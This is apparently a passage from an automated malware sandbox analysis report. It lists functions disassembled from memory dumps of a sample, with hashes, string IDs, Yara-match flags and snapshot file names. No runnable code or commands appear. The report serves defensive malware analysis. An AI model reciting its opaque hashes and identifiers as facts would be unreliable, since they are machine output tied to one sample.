                                                • API String ID: 3446177414-1194432280
                                                • Opcode ID: b40000f8437f7f744d9b2a123a26639192ef74e1dd0649d3eddd4c253d68e340
                                                • Instruction ID: ebe9336beba306364121b8e94998d91fc90202b4dfc25acddae67ccfa5cd4707
                                                • Opcode Fuzzy Hash: b40000f8437f7f744d9b2a123a26639192ef74e1dd0649d3eddd4c253d68e340
                                                • Instruction Fuzzy Hash: A5815AB1D012699BDB25CF54CC40BEEB7B8AF48704F0041EAE909B7250DB709E85CFA5
                                                Function 3265F8B0 Relevance: 7.3, APIs: 1, Strings: 3, Instructions: 263timeCOMMON
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.674222220944.0000000032630000.00000040.00001000.00020000.00000000.sdmp, Offset: 32630000, based on PE: true
                                                • Associated: 00000003.00000002.674222220944.0000000032759000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000003.00000002.674222220944.000000003275D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_32630000_List of Items0001.jbxd
                                                Similarity
                                                • API ID: DebugPrintTimes
                                                • String ID: (HeapHandle != NULL)$HEAP: $HEAP[%wZ]:
                                                • API String ID: 3446177414-3610490719
                                                • Opcode ID: 71325f2f2a18876aa31c9546352f986455f6e2ecafaddf80d36d94799834b3a3
                                                • Instruction ID: 3f8af97f99ba8d12b14e78c3e7fc628dc5bdc02e97a807d2d0c7de092979281c
                                                • Opcode Fuzzy Hash: 71325f2f2a18876aa31c9546352f986455f6e2ecafaddf80d36d94799834b3a3
                                                • Instruction Fuzzy Hash: 8191EF75204B40EFE71ACF25C884B2EB7A9BF86744F600959F9409B281DBB4E841CB97
                                                Function 32680AEB Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 210timeCOMMON
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                • LdrpCheckModule, xrefs: 326C9F24
                                                • minkernel\ntdll\ldrinit.c, xrefs: 326C9F2E
                                                • Failed to allocated memory for shimmed module list, xrefs: 326C9F1C
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.674222220944.0000000032630000.00000040.00001000.00020000.00000000.sdmp, Offset: 32630000, based on PE: true
                                                • Associated: 00000003.00000002.674222220944.0000000032759000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000003.00000002.674222220944.000000003275D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_32630000_List of Items0001.jbxd
                                                Similarity
                                                • API ID: DebugPrintTimes
                                                • String ID: Failed to allocated memory for shimmed module list$LdrpCheckModule$minkernel\ntdll\ldrinit.c
                                                • API String ID: 3446177414-161242083
                                                • Opcode ID: 84c14208bd47e98f7dbdb031fdacced401c66ce072967121880575d7ad18c567
                                                • Instruction ID: f8b68d3e460ec267467e0e82b59c3389ef3087b6787ce7c7865068390ca78a4e
                                                • Opcode Fuzzy Hash: 84c14208bd47e98f7dbdb031fdacced401c66ce072967121880575d7ad18c567
                                                • Instruction Fuzzy Hash: 1C71D0B5A01705DFEB08DF68C990BAEB7F0FF48308F244869D901A7250EB75A982CB55
                                                Function 32707ABE Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 85timeCOMMON
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.674222220944.0000000032630000.00000040.00001000.00020000.00000000.sdmp, Offset: 32630000, based on PE: true
                                                • Associated: 00000003.00000002.674222220944.0000000032759000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000003.00000002.674222220944.000000003275D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_32630000_List of Items0001.jbxd
                                                Similarity
                                                • API ID: DebugPrintTimes
                                                • String ID: /op2
                                                • API String ID: 3446177414-2104935455
                                                • Opcode ID: a8a19ad1a79856a4b05881811a1ea1190721d45e3c3522f7792abb94e18cca12
                                                • Instruction ID: f866ea790b6c3b30548ac4645997b48e12c9dc1c0127d60bdef936d43d473c13
                                                • Opcode Fuzzy Hash: a8a19ad1a79856a4b05881811a1ea1190721d45e3c3522f7792abb94e18cca12
                                                • Instruction Fuzzy Hash: F03103B5E0021A8BDB05CFA9C884ADDFBF5BF48340F14852AE811B7250DB74A945CFA4
                                                Function 3273A04A Relevance: 6.2, APIs: 4, Instructions: 170timeCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.674222220944.0000000032630000.00000040.00001000.00020000.00000000.sdmp, Offset: 32630000, based on PE: true
                                                • Associated: 00000003.00000002.674222220944.0000000032759000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000003.00000002.674222220944.000000003275D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_32630000_List of Items0001.jbxd
                                                Similarity
                                                • API ID: DebugPrintTimes
                                                • String ID:
                                                • API String ID: 3446177414-0
                                                • Opcode ID: 0ee8990696f114582f7eba899b60b1ccd8439238d116db6fb1f5e8497b220ec0
                                                • Instruction ID: e8fb229d9097dfda17e6cb2cdd272ae63671364175af3cc7ad0c1bfca29d54ef
                                                • Opcode Fuzzy Hash: 0ee8990696f114582f7eba899b60b1ccd8439238d116db6fb1f5e8497b220ec0
                                                • Instruction Fuzzy Hash: CD514B75716612DFEB0ACE18C892A19B7F2FB89354B10416DDA06DB752DB71EC41CBC0
                                                Function 32697A4F Relevance: 6.1, APIs: 4, Instructions: 81timethreadCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.674222220944.0000000032630000.00000040.00001000.00020000.00000000.sdmp, Offset: 32630000, based on PE: true
                                                • Associated: 00000003.00000002.674222220944.0000000032759000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000003.00000002.674222220944.000000003275D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_32630000_List of Items0001.jbxd
                                                Similarity
                                                • API ID: DebugPrintTimes$BaseInitThreadThunk
                                                • String ID:
                                                • API String ID: 4281723722-0
                                                • Opcode ID: 646c0407eab43c4e11fd2c0004edcc4d165a5b81a7ca090d385487ca2ce2f0cf
                                                • Instruction ID: d32abf3fdc205180b5a86e968aa82b69e4eaa9327aa4d8544c328eba98f707d5
                                                • Opcode Fuzzy Hash: 646c0407eab43c4e11fd2c0004edcc4d165a5b81a7ca090d385487ca2ce2f0cf
                                                • Instruction Fuzzy Hash: FB3132B5E92268DFCF05DFA8D844A9DFBB0BF48360F20456AE511B7280CB319941CF94
                                                Function 326658E0 Relevance: 5.7, APIs: 2, Strings: 1, Instructions: 494COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.674222220944.0000000032630000.00000040.00001000.00020000.00000000.sdmp, Offset: 32630000, based on PE: true
                                                • Associated: 00000003.00000002.674222220944.0000000032759000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000003.00000002.674222220944.000000003275D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_32630000_List of Items0001.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: @
                                                • API String ID: 0-2766056989
                                                • Opcode ID: 8ae357d7c342633502cf52a6bf3f3eac58f3a9b1e3b57753c1613b56c2064daf
                                                • Instruction ID: 0cb753dcec0e4c1cafd7e8d7f8aafd352808c41f534254a60ec32ed1bd7a2c2e
                                                • Opcode Fuzzy Hash: 8ae357d7c342633502cf52a6bf3f3eac58f3a9b1e3b57753c1613b56c2064daf
                                                • Instruction Fuzzy Hash: 62324674D04369DFEB29CF64C995BE9BBB0BF08308F0041E9D549A7281DBB59A84CF91
                                                Function 32694B79 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 164COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.674222220944.0000000032630000.00000040.00001000.00020000.00000000.sdmp, Offset: 32630000, based on PE: true
                                                • Associated: 00000003.00000002.674222220944.0000000032759000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000003.00000002.674222220944.000000003275D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_32630000_List of Items0001.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 0$Flst
                                                • API String ID: 0-758220159
                                                • Opcode ID: b1136303ffd94a7fc433d420804e47f668696670c94333cc8f039480e19bcefc
                                                • Instruction ID: 2a3d9cdf1c695637c5796996b7425860f564a9b390015715f664642d87a28aee
                                                • Opcode Fuzzy Hash: b1136303ffd94a7fc433d420804e47f668696670c94333cc8f039480e19bcefc
                                                • Instruction Fuzzy Hash: 18519CB5E01248CFEB14CF95C58479DFBF4EF84798F14842AD405AB240EFB09982CB91
                                                Function 3265E880 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 55timeCOMMON
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.674222220944.0000000032630000.00000040.00001000.00020000.00000000.sdmp, Offset: 32630000, based on PE: true
                                                • Associated: 00000003.00000002.674222220944.0000000032759000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000003.00000002.674222220944.000000003275D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_32630000_List of Items0001.jbxd
                                                Similarity
                                                • API ID: DebugPrintTimes
                                                • String ID: e2$me2
                                                • API String ID: 3446177414-2646222625
                                                • Opcode ID: 92e25736f862ebc7ac28341059fe5ce85be078fbb01b40da76f22687f598679c
                                                • Instruction ID: 7e80708e71ac17f2358df23e16bcd4d5346eac0879c26dc24096611f25ed7b29
                                                • Opcode Fuzzy Hash: 92e25736f862ebc7ac28341059fe5ce85be078fbb01b40da76f22687f598679c
                                                • Instruction Fuzzy Hash: 0711B4B6A01218AFDF11CF98D885ADEBBB4FF4C360F10401AF911B7240D775A954CBA4

                                                Executed Functions

                                                Function 03935E83 Relevance: .1, Instructions: 108COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.678885673572.00000000038B0000.00000040.00000001.00040000.00000000.sdmp, Offset: 038B0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_38b0000_MzAJhEkohQv.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 968f3bf57bf60e1c7b678fb80decccfedfbe8c47e4a3fe2b4d628b3b2cb119d0
                                                • Instruction ID: 22527d6e0e3462f40ce9b9efb2b5b5313d99080f79224692156a7f42b2c983fd
                                                • Opcode Fuzzy Hash: 968f3bf57bf60e1c7b678fb80decccfedfbe8c47e4a3fe2b4d628b3b2cb119d0
                                                • Instruction Fuzzy Hash: C231B2516593E14ED30E836D48B9A75AEC18F5B20174FC2EEDADA5F2F3C4848409D3A1
                                                Function 039357EF Relevance: 25.3, Strings: 20, Instructions: 327COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.678885673572.00000000038B0000.00000040.00000001.00040000.00000000.sdmp, Offset: 038B0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_38b0000_MzAJhEkohQv.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID: $*$+'$+D$7-$7O$:$;j$=$C*$C;$F($O$R$h$i$p3$q$r$+
                                                • API String ID: 0-607593665
                                                • Opcode ID: f1fc578b93919b4520c803ea9cfc8ec1b9b3a242b113475edc2ac2c4a97b77a5
                                                • Instruction ID: e7246dd77fbd93de1672cd9fd2a0d000649ea8c758ba8af424079c33e5b626d2
                                                • Opcode Fuzzy Hash: f1fc578b93919b4520c803ea9cfc8ec1b9b3a242b113475edc2ac2c4a97b77a5
                                                • Instruction Fuzzy Hash: 3202C4B0D05369CFEB24CF84C9987DDBBB1BB4A308F208599C1097B291C7B95A88CF54
                                                Function 039431FF Relevance: 6.4, Strings: 5, Instructions: 153COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.678885673572.00000000038B0000.00000040.00000001.00040000.00000000.sdmp, Offset: 038B0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_38b0000_MzAJhEkohQv.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID: 6$O$S$\$s
                                                • API String ID: 0-3854637164
                                                • Opcode ID: df6bf1f473e088d7ed8755ab3b8655fb5246b28cd0f35217eccf8ed898686df2
                                                • Instruction ID: cecfd706a47ef9de531b34eac6e6d9978c7d6c56938a79776c2a6113f4bf084b
                                                • Opcode Fuzzy Hash: df6bf1f473e088d7ed8755ab3b8655fb5246b28cd0f35217eccf8ed898686df2
                                                • Instruction Fuzzy Hash: AB51A1B6D00218ABDB10EFA4DD89FEEB3BCEB84310F444199FD0D6B240E6715A548BA1
                                                Function 039511CF Relevance: 1.3, Strings: 1, Instructions: 61COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.678885673572.00000000038B0000.00000040.00000001.00040000.00000000.sdmp, Offset: 038B0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_38b0000_MzAJhEkohQv.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID: N/
                                                • API String ID: 0-2230471981
                                                • Opcode ID: 45821f822bd6a112d879d1658ba0e66be9743ab32b80b535cae305f0bcbb3ad2
                                                • Instruction ID: c36670f9a2115e8980a32a1dd9889be9aa0bf18fe9948b8248e6c17c5eb5d76f
                                                • Opcode Fuzzy Hash: 45821f822bd6a112d879d1658ba0e66be9743ab32b80b535cae305f0bcbb3ad2
                                                • Instruction Fuzzy Hash: 9711E2B6D01219AF9B00DFA9D8419EEBBF9EF48210F54416AE919F7200E7715A05CBE0
                                                Function 039504EF Relevance: 1.3, Strings: 1, Instructions: 46COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.678885673572.00000000038B0000.00000040.00000001.00040000.00000000.sdmp, Offset: 038B0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_38b0000_MzAJhEkohQv.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID: xH
                                                • API String ID: 0-3728222371
                                                • Opcode ID: 41436248f2cf6a85fab15b1f808728eba07b2984b957a55be01a993ac2195fdc
                                                • Instruction ID: 9b314de55c48e49153dfa302c4c3d448f58961113d5feb7ba042e8dc453b133c
                                                • Opcode Fuzzy Hash: 41436248f2cf6a85fab15b1f808728eba07b2984b957a55be01a993ac2195fdc
                                                • Instruction Fuzzy Hash: FA01D7F6C1121DAFDB40DFE8D9409EEBBF8FA58200F14866AE915F6200F7705A048FA5
                                                Function 0392F4DF Relevance: .1, Instructions: 130COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.678885673572.00000000038B0000.00000040.00000001.00040000.00000000.sdmp, Offset: 038B0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_38b0000_MzAJhEkohQv.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 8d5f012a6e75bf0e5ec9b4f38b09e62a1d18631a9019706f926f2f608116a987
                                                • Instruction ID: 57d027e272feee767f8f0b521a9decaff586c18de876a47e40c053fb7a698cb4
                                                • Opcode Fuzzy Hash: 8d5f012a6e75bf0e5ec9b4f38b09e62a1d18631a9019706f926f2f608116a987
                                                • Instruction Fuzzy Hash: 1A410DB1D11229AFDB04CF99D881AEEBFBCEF48710F10415AFA14E7240E7B09641CBA0
                                                Function 0395415F Relevance: .1, Instructions: 101COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.678885673572.00000000038B0000.00000040.00000001.00040000.00000000.sdmp, Offset: 038B0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_38b0000_MzAJhEkohQv.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: afc08083791cd4c3367bb451d936ab624cead737454b76d927e5b16ec5234181
                                                • Instruction ID: b071abf216ef4b39f3cfbda1054ac1de5879d9743ba51ed73dadb1d7efd4b443
                                                • Opcode Fuzzy Hash: afc08083791cd4c3367bb451d936ab624cead737454b76d927e5b16ec5234181
                                                • Instruction Fuzzy Hash: B431D2B5A01249AFDB14DF99D880EEEB7B9EF8C300F108219FD19A7344D770A851CBA5
                                                Function 039542CF Relevance: .1, Instructions: 93COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.678885673572.00000000038B0000.00000040.00000001.00040000.00000000.sdmp, Offset: 038B0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_38b0000_MzAJhEkohQv.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 879bfce93b8e751f890de86f7072ccb1c9c5561c01a56baee5cbe079793ed205
                                                • Instruction ID: 881b80eb796f69a5a5fa9f4b3b154fdf7b9f2a71f6db528cf126cafd1dfd0a5a
                                                • Opcode Fuzzy Hash: 879bfce93b8e751f890de86f7072ccb1c9c5561c01a56baee5cbe079793ed205
                                                • Instruction Fuzzy Hash: 6C31F9B5A00249AFDB14DF98C881EEEB7B9EF89300F108219FD19A7344D770A951CFA5
                                                Function 03953B8F Relevance: .1, Instructions: 85COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.678885673572.00000000038B0000.00000040.00000001.00040000.00000000.sdmp, Offset: 038B0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_38b0000_MzAJhEkohQv.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 6dcf97ebeee33d321656a0039efa3a98ad46ba0bbefae08a6bedd6f886da809c
                                                • Instruction ID: 9393b039b61e8bfc81f258d53bcddb354a7e0b5ce1784077f16da16499bfe398
                                                • Opcode Fuzzy Hash: 6dcf97ebeee33d321656a0039efa3a98ad46ba0bbefae08a6bedd6f886da809c
                                                • Instruction Fuzzy Hash: 34310DB5A00249ABDB14DF99C841EEFB7B9AF89300F108509FD19A7244D770A855CBA5
                                                Function 0395450F Relevance: .1, Instructions: 77COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.678885673572.00000000038B0000.00000040.00000001.00040000.00000000.sdmp, Offset: 038B0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_38b0000_MzAJhEkohQv.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: b81ccf5bb1a6b48362c1dcd406dfed97a08e0e3710e09a751d4a6d5d64e64365
                                                • Instruction ID: b889331c6d06ee8412d90cfb203e2fdf53b2b3c177c7c14eb85d40ceb472bd8a
                                                • Opcode Fuzzy Hash: b81ccf5bb1a6b48362c1dcd406dfed97a08e0e3710e09a751d4a6d5d64e64365
                                                • Instruction Fuzzy Hash: 9D212AB5A01359AFDB14EF98CC41EAFB7B9EF89300F008509FD199B244D770A951CBA5
                                                Function 0394303F Relevance: .1, Instructions: 75COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.678885673572.00000000038B0000.00000040.00000001.00040000.00000000.sdmp, Offset: 038B0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_38b0000_MzAJhEkohQv.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 0691fa54b677cb903baac7ad1bfee60059e333f578b78df99c5691bf2b52809a
                                                • Instruction ID: bb4b09c1a56a2dbacb25950e161f027d3b6881600ca622f798c3bd1983589ec9
                                                • Opcode Fuzzy Hash: 0691fa54b677cb903baac7ad1bfee60059e333f578b78df99c5691bf2b52809a
                                                • Instruction Fuzzy Hash: EB1173B63803097AF720EE559C82FAB775D9BC4B51F244015FF08AE2C0D6A5F85187B4
                                                Function 03950A6F Relevance: .1, Instructions: 65COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.678885673572.00000000038B0000.00000040.00000001.00040000.00000000.sdmp, Offset: 038B0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_38b0000_MzAJhEkohQv.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 64af05cecdc789c1b4c0eea9e3266596fa3df61c11611d7841240d3655a696bf
                                                • Instruction ID: 6428325c458b4dd0b6a480bc7b16000a7aaf52a922bd4fbe34652a1238a84a2f
                                                • Opcode Fuzzy Hash: 64af05cecdc789c1b4c0eea9e3266596fa3df61c11611d7841240d3655a696bf
                                                • Instruction Fuzzy Hash: 6421FEB6D0121DAF9B00DFA9D8409EFBBF9EF88210F14416AE919E7200E6705A55CFE0
                                                Function 0395399F Relevance: .1, Instructions: 65COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.678885673572.00000000038B0000.00000040.00000001.00040000.00000000.sdmp, Offset: 038B0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_38b0000_MzAJhEkohQv.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 6bf1b2a8853745f1ac70e4228c92ac0ca62aea8f3a6c9f384016331ed9fd14c7
                                                • Instruction ID: 8f37dc0ac642966acf58ef71d26654cbdf1be8c84ac0de9f34c8228ec723cd95
                                                • Opcode Fuzzy Hash: 6bf1b2a8853745f1ac70e4228c92ac0ca62aea8f3a6c9f384016331ed9fd14c7
                                                • Instruction Fuzzy Hash: 201190B56013596BD710EFA8CC45FAFB7ADEBC5300F004509FD19AB281E7716911CBA5
                                                Function 0395381F Relevance: .1, Instructions: 65COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.678885673572.00000000038B0000.00000040.00000001.00040000.00000000.sdmp, Offset: 038B0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_38b0000_MzAJhEkohQv.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: fa928f1e22e57b770b8acdc88e85465f077b380a9d82635e80c06c37553662f8
                                                • Instruction ID: 3976f898b3abf790052e8bcf3f241f6df365e4d136d70121ab1d39395e3103ce
                                                • Opcode Fuzzy Hash: fa928f1e22e57b770b8acdc88e85465f077b380a9d82635e80c06c37553662f8
                                                • Instruction Fuzzy Hash: 56118EB5A413496BD710EF68CC45FAFB3ADEBC5300F008509FD19AB240D7716915CBA5
                                                Function 0395057F Relevance: .1, Instructions: 65COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.678885673572.00000000038B0000.00000040.00000001.00040000.00000000.sdmp, Offset: 038B0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_38b0000_MzAJhEkohQv.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: cf618fcd25cc473fcddc84176ffd31cbd3963ce1d315d77fef777b479c4743f0
                                                • Instruction ID: 98943bb6738c4faf7e2de88307eedb4b4c5bb3bada4e5a011b4dce9fca9b89ab
                                                • Opcode Fuzzy Hash: cf618fcd25cc473fcddc84176ffd31cbd3963ce1d315d77fef777b479c4743f0
                                                • Instruction Fuzzy Hash: 3C21F1B6D0121DAF9B00DF99D8418EFBBF9FF98210F04426AE915E7200E7705A558BA0
                                                Function 039518BF Relevance: .1, Instructions: 63COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.678885673572.00000000038B0000.00000040.00000001.00040000.00000000.sdmp, Offset: 038B0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_38b0000_MzAJhEkohQv.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 2e140b92dc857c72a906da5101ca759838e82b92c7830381d4c89b6cba42f48b
                                                • Instruction ID: ea3df72dca7db055546a5dfca3de9a46eb1e4aa117fab91a963bbd9edec74224
                                                • Opcode Fuzzy Hash: 2e140b92dc857c72a906da5101ca759838e82b92c7830381d4c89b6cba42f48b
                                                • Instruction Fuzzy Hash: 231100B6D0121CAF9B40DFA9D9419EEBBF9EF88200F04455AE919E7200E7715A04CBE1
                                                Function 0394C7FF Relevance: .1, Instructions: 59COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.678885673572.00000000038B0000.00000040.00000001.00040000.00000000.sdmp, Offset: 038B0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_38b0000_MzAJhEkohQv.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 10ffc6aa865e63e40f6dd03ccdf9b007c944ae3533584ab10e39e0934b7f132a
                                                • Instruction ID: 9ad42a78347d8e280d42f3bcce652042027eccaa5542b6c6b5b695ccd01203f5
                                                • Opcode Fuzzy Hash: 10ffc6aa865e63e40f6dd03ccdf9b007c944ae3533584ab10e39e0934b7f132a
                                                • Instruction Fuzzy Hash: 040192BAA413183BD710EA64DC55DEF73ACDF95210F000295FD189B241FA70AED28BE1
                                                Function 0395486F Relevance: .0, Instructions: 47COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.678885673572.00000000038B0000.00000040.00000001.00040000.00000000.sdmp, Offset: 038B0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_38b0000_MzAJhEkohQv.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 5b60cde32ad96e625a3901cd5830536d60fa7190b41b442b0b011c2235f44591
                                                • Instruction ID: 38738d3ee7e21611b1e82477da97228b4f4940d391be562925526398042ffd4a
                                                • Opcode Fuzzy Hash: 5b60cde32ad96e625a3901cd5830536d60fa7190b41b442b0b011c2235f44591
                                                • Instruction Fuzzy Hash: 3101D6B2201609BBCB44DE99DC80EDB77ADAF8D710F014208FA09D7241D630F851CBA4
                                                Function 0392F4D1 Relevance: .0, Instructions: 47COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.678885673572.00000000038B0000.00000040.00000001.00040000.00000000.sdmp, Offset: 038B0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_38b0000_MzAJhEkohQv.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: bd2916e988c7f161540edc70877dc47418bdf8b7f508e2479f27bdb52a9506d0
                                                • Instruction ID: 3a6e760823968f9cbd16c116eda21f3b752b27dc20558fdb2d5333800f547267
                                                • Opcode Fuzzy Hash: bd2916e988c7f161540edc70877dc47418bdf8b7f508e2479f27bdb52a9506d0
                                                • Instruction Fuzzy Hash: A011B3B1D21229AFCB44CFAD988459EBFF8FB48720F10865BE828E7200D37096508F94
                                                Function 0392F62F Relevance: .0, Instructions: 40COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.678885673572.00000000038B0000.00000040.00000001.00040000.00000000.sdmp, Offset: 038B0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_38b0000_MzAJhEkohQv.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: d591ab213f59699916673ca8ade890358cd20f12af629e45536e6f8d1b7e5dad
                                                • Instruction ID: 9dceb5358ba3f6354e5d96c328bef22fedcc57d71d5a39db0517703239d51b02
                                                • Opcode Fuzzy Hash: d591ab213f59699916673ca8ade890358cd20f12af629e45536e6f8d1b7e5dad
                                                • Instruction Fuzzy Hash: 92F0A77761021E6BD714AA6DAC80F86FB9CEB89334F240222FA1D9B351D671D46183A0
                                                Function 03953A9F Relevance: .0, Instructions: 33COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.678885673572.00000000038B0000.00000040.00000001.00040000.00000000.sdmp, Offset: 038B0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_38b0000_MzAJhEkohQv.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
